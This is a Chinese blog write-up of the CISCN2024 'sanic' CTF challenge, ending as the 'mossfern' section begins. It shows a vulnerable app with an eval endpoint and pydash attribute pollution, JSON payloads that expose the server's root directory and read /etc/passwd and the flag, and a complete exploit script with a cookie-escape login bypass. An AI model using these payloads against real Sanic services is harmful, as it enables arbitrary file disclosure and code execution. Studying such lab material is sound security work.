<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">static</span>(<span class="params"></span></span><br><span class="line"><span class="params">    self,</span></span><br><span class="line"><span class="params">    uri: <span class="built_in">str</span>,</span></span><br><span class="line"><span class="params">    file_or_directory: <span class="type">Union</span>[PathLike, <span class="built_in">str</span>],</span></span><br><span class="line"><span class="params">    pattern: <span class="built_in">str</span> = <span class="string">r&quot;/?.+&quot;</span>,</span></span><br><span class="line"><span class="params">    use_modified_since: <span class="built_in">bool</span> = <span class="literal">True</span>,</span></span><br><span class="line"><span class="params">    use_content_range: <span class="built_in">bool</span> = <span class="literal">False</span>,</span></span><br><span class="line"><span class="params">    stream_large_files: <span class="type">Union</span>[<span class="built_in">bool</span>, <span class="built_in">int</span>] = <span class="literal">False</span>,</span></span><br><span class="line"><span class="params">    name: <span class="built_in">str</span> = <span class="string">&quot;static&quot;</span>,</span></span><br><span class="line"><span class="params">    host: <span class="type">Optional</span>[<span class="built_in">str</span>] = <span class="literal">None</span>,</span></span><br><span class="line"><span class="params">    strict_slashes: <span class="type">Optional</span>[<span class="built_in">bool</span>] = <span class="literal">None</span>,</span></span><br><span class="line"><span class="params">    content_type: <span class="type">Optional</span>[<span class="built_in">str</span>] = <span class="literal">None</span>,</span></span><br><span class="line"><span class="params">    apply: <span class="built_in">bool</span> = <span class="literal">True</span>,</span></span><br><span class="line"><span class="params">    resource_type: <span class="type">Optional</span>[<span class="built_in">str</span>] = <span class="literal">None</span>,</span></span><br><span class="line"><span class="params">    index: <span class="type">Optional</span>[<span class="type">Union</span>[<span class="built_in">str</span>, <span class="type">Sequence</span>[<span class="built_in">str</span>]]] = <span class="literal">None</span>,</span></span><br><span class="line"><span class="params">    directory_view: <span class="built_in">bool</span> = <span class="literal">False</span>,</span></span><br><span class="line"><span class="params">    directory_handler: <span class="type">Optional</span>[DirectoryHandler] = <span class="literal">None</span>,</span></span><br><span class="line"><span class="params"></span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;Register a root to serve files from. The input can either be a file or a directory.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    This method provides an easy and simple way to set up the route necessary to serve static files.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Args:</span></span><br><span class="line"><span class="string">        uri (str): URL path to be used for serving static content.</span></span><br><span class="line"><span class="string">        file_or_directory (Union[PathLike, str]): Path to the static file</span></span><br><span class="line"><span class="string">            or directory with static files.</span></span><br><span class="line"><span class="string">        pattern (str, optional): Regex pattern identifying the valid</span></span><br><span class="line"><span class="string">            static files. Defaults to `r&quot;/?.+&quot;`.</span></span><br><span class="line"><span class="string">        use_modified_since (bool, optional): If true, send file modified</span></span><br><span class="line"><span class="string">            time, and return not modified if the browser&#x27;s matches the</span></span><br><span class="line"><span class="string">            server&#x27;s. Defaults to `True`.</span></span><br><span class="line"><span class="string">        use_content_range (bool, optional): If true, process header for</span></span><br><span class="line"><span class="string">            range requests and sends  the file part that is requested.</span></span><br><span class="line"><span class="string">            Defaults to `False`.</span></span><br><span class="line"><span class="string">        stream_large_files (Union[bool, int], optional): If `True`, use</span></span><br><span class="line"><span class="string">            the `StreamingHTTPResponse.file_stream` handler rather than</span></span><br><span class="line"><span class="string">            the `HTTPResponse.file handler` to send the file. If this</span></span><br><span class="line"><span class="string">            is an integer, it represents the threshold size to switch</span></span><br><span class="line"><span class="string">            to `StreamingHTTPResponse.file_stream`. Defaults to `False`,</span></span><br><span class="line"><span class="string">            which means that the response will not be streamed.</span></span><br><span class="line"><span class="string">        name (str, optional): User-defined name used for url_for.</span></span><br><span class="line"><span class="string">            Defaults to `&quot;static&quot;`.</span></span><br><span class="line"><span class="string">        host (Optional[str], optional): Host IP or FQDN for the</span></span><br><span class="line"><span class="string">            service to use.</span></span><br><span class="line"><span class="string">        strict_slashes (Optional[bool], optional): Instruct Sanic to</span></span><br><span class="line"><span class="string">            check if the request URLs need to terminate with a slash.</span></span><br><span class="line"><span class="string">        content_type (Optional[str], optional): User-defined content type</span></span><br><span class="line"><span class="string">            for header.</span></span><br><span class="line"><span class="string">        apply (bool, optional): If true, will register the route</span></span><br><span class="line"><span class="string">            immediately. Defaults to `True`.</span></span><br><span class="line"><span class="string">        resource_type (Optional[str], optional): Explicitly declare a</span></span><br><span class="line"><span class="string">            resource to be a `&quot;file&quot;` or a `&quot;dir&quot;`.</span></span><br><span class="line"><span class="string">        index (Optional[Union[str, Sequence[str]]], optional): When</span></span><br><span class="line"><span class="string">            exposing against a directory, index is  the name that will</span></span><br><span class="line"><span class="string">            be served as the default file. When multiple file names are</span></span><br><span class="line"><span class="string">            passed, then they will be tried in order.</span></span><br><span class="line"><span class="string">        directory_view (bool, optional): Whether to fallback to showing</span></span><br><span class="line"><span class="string">            the directory viewer when exposing a directory. Defaults</span></span><br><span class="line"><span class="string">            to `False`.</span></span><br><span class="line"><span class="string">        directory_handler (Optional[DirectoryHandler], optional): An</span></span><br><span class="line"><span class="string">            instance of DirectoryHandler that can be used for explicitly</span></span><br><span class="line"><span class="string">            controlling and subclassing the behavior of the default</span></span><br><span class="line"><span class="string">            directory handler.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Returns:</span></span><br><span class="line"><span class="string">        List[sanic.router.Route]: Routes registered on the router.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Examples:</span></span><br><span class="line"><span class="string">        Serving a single file:</span></span><br></pre></td></tr></table></figure>

<p>我们其实后面对每个属性都不用看，直接看两个属性，一个是<code>file_or_directory</code>，一个是<code>directory_view</code></p>
<p><img src="/../images/achieve/2025/2/CISCN2024/QQ20250224-204438.jpg" alt="1"></p>
<p>该函数的作用是 <strong>为 Sanic 应用注册静态文件或静态目录</strong>，并返回注册的路由信息。</p>
<ul>
<li>如果 <code>file_or_directory</code> 是文件 → 访问该 URL 时直接返回该文件内容。</li>
<li>如果 <code>file_or_directory</code> 是目录 → 允许访问目录中的文件，甚至可以自动列出目录内容。</li>
</ul>
<p>也就是说，我们首先污染<code>directory_view</code>为<code>True</code>，然后污染<code>file_or_directory</code>为<code>/</code>，拿到文件名就可以污染flag了，但是下一步该如何呢，我们应该怎么去获取到这个类和属性呢，看到下面出现了很多<code>directory_handler</code>所以直接跟进到<code>DirectoryHandler</code>(个人推荐自己起Docker来进行动态调试)，</p>
<p><img src="/../images/achieve/2025/2/CISCN2024/QQ20250224-205159.jpg" alt="1"></p>
<p>可以看到初始化的时候就得到了属性名，但是只是知道这个属性在这里，并不知道如何的去获得这个属性，<a target="_blank" rel="noopener" href="https://www.cnblogs.com/ljc-0923/p/10391799.html">sanic资料</a> 在这篇文章里里面知道sanic自带路由，并且里面也有<code>app.add_route</code>怎么感觉可以注入内存马呢，不过这里我们先思考一下问题，那我们现在就是要获得注册的路由，<code>app.router.routes</code> 或<code>app.router.routes_layer</code>，那还是要自己起环境</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> sanic <span class="keyword">import</span> Sanic</span><br><span class="line"><span class="keyword">from</span> sanic.response <span class="keyword">import</span> text, html</span><br><span class="line"><span class="keyword">import</span> pydash</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"></span><br><span class="line"><span class="comment"># pydash==5.1.2</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Pollute</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Sanic(__name__)</span><br><span class="line">app.static(<span class="string">&quot;/static/&quot;</span>, <span class="string">&quot;./static/&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/src&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">src</span>(<span class="params">request</span>):</span><br><span class="line">    <span class="built_in">eval</span>(request.args.get(<span class="string">&#x27;rce&#x27;</span>))</span><br><span class="line">    <span class="keyword">return</span> text(<span class="built_in">open</span>(__file__).read())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/admin&quot;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">admin</span>(<span class="params">request</span>):</span><br><span class="line">    key = request.json[<span class="string">&#x27;key&#x27;</span>]</span><br><span class="line">    value = request.json[<span class="string">&#x27;value&#x27;</span>]</span><br><span class="line">    <span class="keyword">if</span> key <span class="keyword">and</span> value <span class="keyword">and</span> <span class="built_in">type</span>(key) <span class="keyword">is</span> <span class="built_in">str</span> <span class="keyword">and</span> <span class="string">&#x27;_.&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> key:</span><br><span class="line">        pollute = Pollute()</span><br><span class="line">        pydash.set_(pollute, key, value)</span><br><span class="line">        <span class="keyword">return</span> text(<span class="string">&quot;success&quot;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> text(<span class="string">&quot;forbidden&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p><img src="/../images/achieve/2025/2/CISCN2024/QQ20250224-211317.jpg" alt="1"></p>
<p><code>/src?rce=print(app.router.routes[2])</code>得到<code>&lt;Route: name=__mp_main__.static path=static/&lt;__file_uri__:path&gt;&gt;</code>，那我们访问的时候就是</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.routes[2]&quot;</span></span><br></pre></td></tr></table></figure>

<p>不过后面尝试污染的时候发现这样子不行，并不能成功，必须要找个返回是列表的来进行访问，看gxn男神用的是<code>name_index</code>方法来进行访问的，我在网上查查资料也没找到，只能用这个了，直接打断点</p>
<p><img src="/../images/achieve/2025/2/CISCN2024/QQ20250224-214056.jpg" alt="1"></p>
<p>然后我发现居然就打这个一个断点就能拿到答案了</p>
<p><img src="/../images/achieve/2025/2/CISCN2024/QQ20250224-214445.jpg" alt="1"></p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view&quot;</span><span class="punctuation">,</span><span class="attr">&quot;value&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>就可以把目录列出来了，访问<code>/stctic/</code>发现成功</p>
<p><img src="/../images/achieve/2025/2/CISCN2024/QQ20250224-214718.jpg" alt="1"></p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory&quot;</span><span class="punctuation">,</span><span class="attr">&quot;value&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/&quot;</span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>正准备拿flag呢，结果发现这样报错了，我们再次调试看看是为啥</p>
<p><img src="/../images/achieve/2025/2/CISCN2024/QQ20250224-215202.jpg" alt="1"></p>
<p>原来<code>directory</code>是一个对象，并且<code>parts</code>才是路径，回到最开始的跟进，我们跟进<code>parts</code>，结果发现根本找不到<code>_parts</code>这个属性，然后尝试污染一下，发现仍然是报错，可能最新版的sanic已经没有了？感兴趣的师傅可以降版本回去找到这个，</p>
<p>经过本人的多次尝试可以知道他肯定是没有这个属性了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/src/?rce=print(app.router.name_index[&#x27;__mp_main__.static&#x27;].handler.keywords[&#x27;directory_handler&#x27;].directory[&#x27;_parts&#x27;])</span><br><span class="line"># 结果报错</span><br><span class="line"></span><br><span class="line">/src/?rce=print(app.router.name_index[&#x27;__mp_main__.static&#x27;].handler.keywords[&#x27;directory_handler&#x27;].directory)</span><br><span class="line"># E:\PyCharm\object\test\flask_demo\static</span><br><span class="line"></span><br><span class="line">/src/?rce=print(app.router.name_index[&#x27;__mp_main__.static&#x27;].handler.keywords[&#x27;directory_handler&#x27;].directory_view)</span><br><span class="line"># False</span><br></pre></td></tr></table></figure>

<p>本来预期是返回一个列表，然后赋值即可，现在只能靠ctfshow的复现环境来了</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory._parts&quot;</span><span class="punctuation">,</span><span class="attr">&quot;value&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">&quot;/&quot;</span><span class="punctuation">]</span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>拿到<code>24bcbd0192e591d6ded1_flag</code></p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;.__init__\\\\.__globals__\\\\.__file__&quot;</span><span class="punctuation">,</span><span class="attr">&quot;value&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/24bcbd0192e591d6ded1_flag&quot;</span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>顺便写个一把梭哈的脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"><span class="comment"># 设置目标URL</span></span><br><span class="line">url = <span class="string">&quot;http://68fedf48-fdf7-4198-97d7-0b24f086966b.challenge.ctf.show/&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 第一步：登录并获取 session</span></span><br><span class="line">r1 = requests.get(url + <span class="string">&quot;login&quot;</span>, cookies=&#123;<span class="string">&quot;user&quot;</span>: <span class="string">&#x27;&quot;adm\\073n&quot;&#x27;</span>&#125;)</span><br><span class="line">time.sleep(<span class="number">0.05</span>)</span><br><span class="line"><span class="keyword">if</span> <span class="string">&quot;login success&quot;</span> <span class="keyword">in</span> r1.text:</span><br><span class="line">    set_cookie_header = r1.headers.get(<span class="string">&#x27;Set-Cookie&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">    session_value = <span class="literal">None</span></span><br><span class="line">    <span class="keyword">for</span> cookie <span class="keyword">in</span> set_cookie_header.split(<span class="string">&#x27;,&#x27;</span>):</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;session=&#x27;</span> <span class="keyword">in</span> cookie:</span><br><span class="line">            session_value = cookie.split(<span class="string">&#x27;=&#x27;</span>)[<span class="number">1</span>].split(<span class="string">&#x27;;&#x27;</span>)[<span class="number">0</span>]  <span class="comment"># 提取 session 值</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">if</span> session_value:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;Session 值记录成功: <span class="subst">&#123;session_value&#125;</span>&quot;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;未找到 session 值，无法继续。&quot;</span>)</span><br><span class="line">        exit(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;登录失败，无法获取 session。&quot;</span>)</span><br><span class="line">    exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 第二步：构建污染 payload</span></span><br><span class="line">data1 = &#123;</span><br><span class="line">    <span class="string">&quot;key&quot;</span>: <span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.__file__&quot;</span>,  <span class="comment"># 这将污染 Python 对象的 __file__ 属性</span></span><br><span class="line">    <span class="string">&quot;value&quot;</span>: <span class="string">&quot;/etc/passwd&quot;</span>  <span class="comment"># 设置为敏感文件路径</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Step 2: 原型链污染 (数据2)</span></span><br><span class="line">data2 = &#123;</span><br><span class="line">    <span class="string">&quot;key&quot;</span>: <span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view&quot;</span>,</span><br><span class="line">    <span class="string">&quot;value&quot;</span>: <span class="literal">True</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Step 3: 修改路径处理 (数据3)</span></span><br><span class="line">data3 = &#123;</span><br><span class="line">    <span class="string">&quot;key&quot;</span>: <span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory._parts&quot;</span>,</span><br><span class="line">    <span class="string">&quot;value&quot;</span>: [<span class="string">&quot;/&quot;</span>]</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Step 2: 发起原型链污染请求</span></span><br><span class="line">r2 = requests.post(url + <span class="string">&quot;admin&quot;</span>, cookies=&#123;<span class="string">&quot;session&quot;</span>: session_value&#125;, json=data1)</span><br><span class="line">time.sleep(<span class="number">0.05</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;第二步请求响应: <span class="subst">&#123;r2.text&#125;</span> (状态码: <span class="subst">&#123;r2.status_code&#125;</span>)&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 检查第二步请求是否成功</span></span><br><span class="line"><span class="keyword">if</span> r2.status_code == <span class="number">200</span> <span class="keyword">and</span> <span class="string">&quot;success&quot;</span> <span class="keyword">in</span> r2.text:</span><br><span class="line">    <span class="comment"># 请求 static 目录以读取敏感数据</span></span><br><span class="line">    time.sleep(<span class="number">0.05</span>)</span><br><span class="line">    r3 = requests.get(url + <span class="string">&#x27;src&#x27;</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;第三步请求响应: <span class="subst">&#123;r3.text&#125;</span> (状态码: <span class="subst">&#123;r3.status_code&#125;</span>)&quot;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;第二步请求失败，无法进行原型链污染。&quot;</span>)</span><br><span class="line">    exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Step 3: 发起数据2和数据3请求</span></span><br><span class="line">r3 = requests.post(url + <span class="string">&quot;admin&quot;</span>, cookies=&#123;<span class="string">&quot;session&quot;</span>: session_value&#125;, json=data2)</span><br><span class="line">time.sleep(<span class="number">0.05</span>)</span><br><span class="line">r4 = requests.post(url + <span class="string">&quot;admin&quot;</span>, cookies=&#123;<span class="string">&quot;session&quot;</span>: session_value&#125;, json=data3)</span><br><span class="line">time.sleep(<span class="number">0.05</span>)</span><br><span class="line">r5 = requests.get(url + <span class="string">&quot;static/&quot;</span>, cookies=&#123;<span class="string">&quot;session&quot;</span>: session_value&#125;)</span><br><span class="line">time.sleep(<span class="number">0.05</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;第五步请求响应: <span class="subst">&#123;r5.text&#125;</span> (状态码: <span class="subst">&#123;r5.status_code&#125;</span>)&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 使用正则匹配 flag</span></span><br><span class="line"><span class="keyword">if</span> <span class="string">&quot;flag&quot;</span> <span class="keyword">in</span> r5.text:</span><br><span class="line">    <span class="keyword">match</span> = re.search(<span class="string">r&#x27;\b[A-Za-z0-9]+_flag\b&#x27;</span>, r5.text)</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">match</span>:</span><br><span class="line">        flag = <span class="keyword">match</span>.group(<span class="number">0</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;Flag 被捕捉到: <span class="subst">&#123;flag&#125;</span>&quot;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;未找到 flag。&quot;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;没有发现 flag。&quot;</span>)</span><br><span class="line">    exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Step 4: 构建数据4并执行请求</span></span><br><span class="line">data4 = &#123;</span><br><span class="line">    <span class="string">&quot;key&quot;</span>: <span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.__file__&quot;</span>,  <span class="comment"># 这将污染 Python 对象的 __file__ 属性</span></span><br><span class="line">    <span class="string">&quot;value&quot;</span>: <span class="string">&quot;/&quot;</span> + flag  <span class="comment"># 设置为敏感文件路径</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">r6 = requests.post(url + <span class="string">&quot;admin&quot;</span>, cookies=&#123;<span class="string">&quot;session&quot;</span>: session_value&#125;, json=data4)</span><br><span class="line">time.sleep(<span class="number">0.05</span>)</span><br><span class="line">r7 = requests.get(url + <span class="string">&#x27;src&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;第七步请求响应: <span class="subst">&#123;r7.text&#125;</span> (状态码: <span class="subst">&#123;r7.status_code&#125;</span>)&quot;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="mossfern"><a href="#mossfern" class="headerlink" title="mossfern"></a>mossfern</h2><p>一看题目描述，就很容易知道是python沙箱逃逸了</p>
<p><img src="/../images/achieve/2025/2/CISCN2024/QQ20250225-153353.jpg" alt="1"></p>
<p>创建文件把代码放到里面然后再来运行</p>

  </div>

  <!-- 赞赏按钮和二维码 -->
  <div class="donation-container">
    <button id="donate-btn" class="donate-btn">reward</button>
    <div id="donation-qr" class="donation-qr" style="display: none;">
      <img src="/images/award.png" alt="扫码打赏" />
    </div>
  </div>
  <!-- 赞赏按钮和二维码的结束 -->

</article>




    <div class="blog-post-comments">
        <div id="waline_thread"></div>
    </div>

        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">H0me</a></li>
        
          <li><a href="/about/">Aβout</a></li>
        
          <li><a href="/tags/">Topi3s</a></li>
        
          <li><a href="/categories/">Cat4gory</a></li>
        
          <li><a href="/links/">Li^ks</a></li>
        
          <li><a href="/search/">Seαrch</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01"><span class="toc-number">1.</span> <span class="toc-text">0x01</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-question"><span class="toc-number">2.</span> <span class="toc-text">0x02 question</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#simple-php"><span class="toc-number">2.1.</span> <span class="toc-text">simple_php</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easycms"><span class="toc-number">2.2.</span> <span class="toc-text">easycms</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sanic"><span class="toc-number">2.3.</span> <span class="toc-text">sanic</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mossfern"><span class="toc-number">2.4.</span> <span class="toc-text">mossfern</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://baozongwi.xyz/2024/12/12/CISCN2024/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&text=CISCN2024"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&title=CISCN2024"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
